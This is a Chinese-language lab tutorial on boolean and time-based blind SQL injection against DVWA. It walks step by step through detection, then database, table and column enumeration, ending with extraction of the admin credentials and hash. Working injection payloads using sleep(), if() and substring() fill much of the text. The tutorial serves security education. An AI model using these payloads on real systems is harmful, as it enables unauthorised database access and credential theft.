一、代码分析
在页面中不会显示数据库信息,一般情况下只会显示对与错的内容。
接收 id 的值,直接带入查询,如果存在即返回 users is exists in the database,否则显示 users id is missing。
像这种只有正确与错误页面。页面不会显示数据库里任何内容,如果存在注入,成为盲注。
盲注入的方式有两种:一种是布尔型盲注入,另外一种是延时注入。
二、判断盲注
输入 SQL 注入检测语句,判断页面是否不一样,如果不一样,大概会存在 SQL 注入漏洞。
1'and '1'='1,一样;1'and '1'='2,不一样。
如果输入检测语句,页面没有任何改变,可以使用延时语句检测 1' and sleep(10)--+,函数 sleep() 在 mysql 是延时返回的意思,
以秒为单位,sleep(10) 即延时 10 秒执行。
三、布尔型注入攻击
1、判断bool盲注
布尔型注入攻击,页面不会返回任何数据库内容,所以不能使用联合查询将敏感信息显示在页面,但是可以通过构造 SQL 语句,获取数据。
布尔型盲注入用到的 SQL 语句 select if(1=1,1,0)。
if()函数在 mysql 是判断,第一个参数表达式,如果条件成立,会显示 1,否则显示 0。1=1 表达式可以换成构造的 SQL 攻击语句。
1' and if(1=1,1,0)--+
页面返回正常,这个语句实际上是 1' and 1,真 and 真,结果为真,1 是存在记录的。所以返回正确页面。
1' and if(1=2,1,0)--+
页面返回错误,这个语句就是 1' and 0,真 and 假,结果为假,整个 SQL 的值也是 0,所以没有记录,返回错误页面。
2、获取数据库敏感信息
在黑盒的环境下,通过构造 SQL 注入语句,根据页面的特征确定获取敏感信息。
布尔型盲注入用到的函数:
SUBSTRING()字符串截取,第一个参数是字符串,第二个参数是开始截取位置,第三个是截取的长度。
2.1、查询当前库
select database()查询当前库
2.2、substring函数
通过 substring 截取截取长度。
接着再用 if 函数进行构造:
select if(SUBSTRING(database(),1,1)='d',1,0)
判断数据库第一个字是不是字符 d,如果是返回 1 否则返回 0 。
接着判断第二个字符,将 substring 第二个参数写成 2:
select if(SUBSTRING(database(),2,1)='v',1,0)
因为要截取第二个字符,第二个字符为 v,如此类推,最后拼接字符就是完整的库名。
四、在黑盒模式下布尔型注入
先判断注入,判断完注入就获取数据库的长度,得到长度再查询库名,通过库名再查询表,接着通过表查询字段,最后查询某表指定的数据。
1、判断数据库长度
要查询当前库名,首先确定要查询数据库的长度,再通过截取字符进行对比。
1' and if(length(database())=4,1,0)--+
判断库名的长度为 4
2、判断数据库名
截取第一个字符再进行判断:
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.@_
每次都要与这些字符进行判断,最后得到 d
1' and if(substring(database(),1,1)='d',1,0)--+
3、利用 Cluster boomb 测试
1' and if(substring(database(),1,1)='d',1,0)--+
抓包发送到测试模块,选择 Cluster boomb 模式,设置两个变量。
拼接字符得到库名 dvwa
4、获取表名
4.1、获取第一张表
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),1,1)='g',1,0)--+
4.2、获取第二张表
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='u',1,0)--+
5、获取字段名
5.1、抓包
1'and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 0,1),1,1)='i',1,0)--+
当前库的表的第一个列字符是否等于 i ,如果等于 i ,返回正则页面,否则返回错误页面。
5.2、添加荷载
5.3、获取user表的字段
6、获取账号和密码
6.1、先判断查询账号和密码的长度
1' and if((SELECT LENGTH(CONCAT(user,0x3a,PASSWORD)) from users limit 0,1)=38,1,0)--+
6.2、获取账号和密码
1' and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 0,1),1,1)='a',1,0)--+
最后整理结果得出 admin:5f4dcc3b5aa765d61d8327deb882cf99